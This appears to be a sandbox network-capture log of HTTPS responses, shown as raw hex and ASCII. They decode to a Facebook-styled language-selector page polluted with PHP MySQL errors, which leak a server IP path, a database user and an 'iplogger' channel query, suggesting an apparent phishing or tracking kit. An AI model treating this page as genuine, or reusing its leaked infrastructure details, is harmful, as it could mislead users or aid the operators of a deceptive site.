2022-10-07 13:58:46 UTC	206	IN	Data Raw: 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 Data Ascii: \u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u00
2022-10-07 13:58:46 UTC	208	IN	Data Raw: 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 Data Ascii: 00\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253C\/b\u00253E\u00250A\u00253C\/font\u00253E", "www_list_selector", 1); r
2022-10-07 13:58:46 UTC	209	IN	Data Raw: 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 Data Ascii: #039;38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("I
2022-10-07 13:58:46 UTC	211	IN	Data Raw: 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 30 30 32 35 32 30 62 6f 6f 6c 65 61 6e 5c 75 30 30 32 35 32 30 67 69 76 65 6e 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 Data Ascii: 2520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u002520boolean\u002520given\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u00
2022-10-07 13:58:46 UTC	212	IN	Data Raw: 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 Data Ascii: d%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@&
2022-10-07 13:58:46 UTC	214	IN	Data Raw: 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c Data Ascii: 20be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520l
2022-10-07 13:58:46 UTC	215	IN	Data Raw: 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 Data Ascii: 520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00
2022-10-07 13:58:46 UTC	216	IN	Data Raw: 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b Data Ascii: ean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@
2022-10-07 13:58:46 UTC	218	IN	Data Raw: 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 Data Ascii: 39;localhost'\u002520(using\u002520password:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u0025
2022-10-07 13:58:46 UTC	219	IN	Data Raw: 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 34 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 41 6c 62 61 6e 69 61 6e 22 3e 53 68 71 69 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 Data Ascii: E\u00250A\u00253C\/font\u00253E", "www_list_selector", 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%2
2022-10-07 13:58:46 UTC	221	IN	Data Raw: 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 65 73 5f 4c 41 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 Data Ascii: r%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("es_LA", "en_US", "https:\/\/es-la.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u0
2022-10-07 13:58:46 UTC	222	IN	Data Raw: 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 Data Ascii: emorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E104
2022-10-07 13:58:46 UTC	224	IN	Data Raw: 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 Data Ascii: cess%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb
2022-10-07 13:58:46 UTC	225	IN	Data Raw: 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e Data Ascii: des\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconn
2022-10-07 13:58:46 UTC	227	IN	Data Raw: 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 Data Ascii: 6bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C
2022-10-07 13:58:46 UTC	228	IN	Data Raw: 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 Data Ascii: %20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0
2022-10-07 13:58:46 UTC	230	IN	Data Raw: 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 65 2c 5c 75 Data Ascii: E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resource,\u
2022-10-07 13:58:46 UTC	231	IN	Data Raw: 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 Data Ascii: %3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%
2022-10-07 13:58:46 UTC	233	IN	Data Raw: 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 Data Ascii: ated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PD
2022-10-07 13:58:46 UTC	234	IN	Data Raw: 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f Data Ascii: u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplo
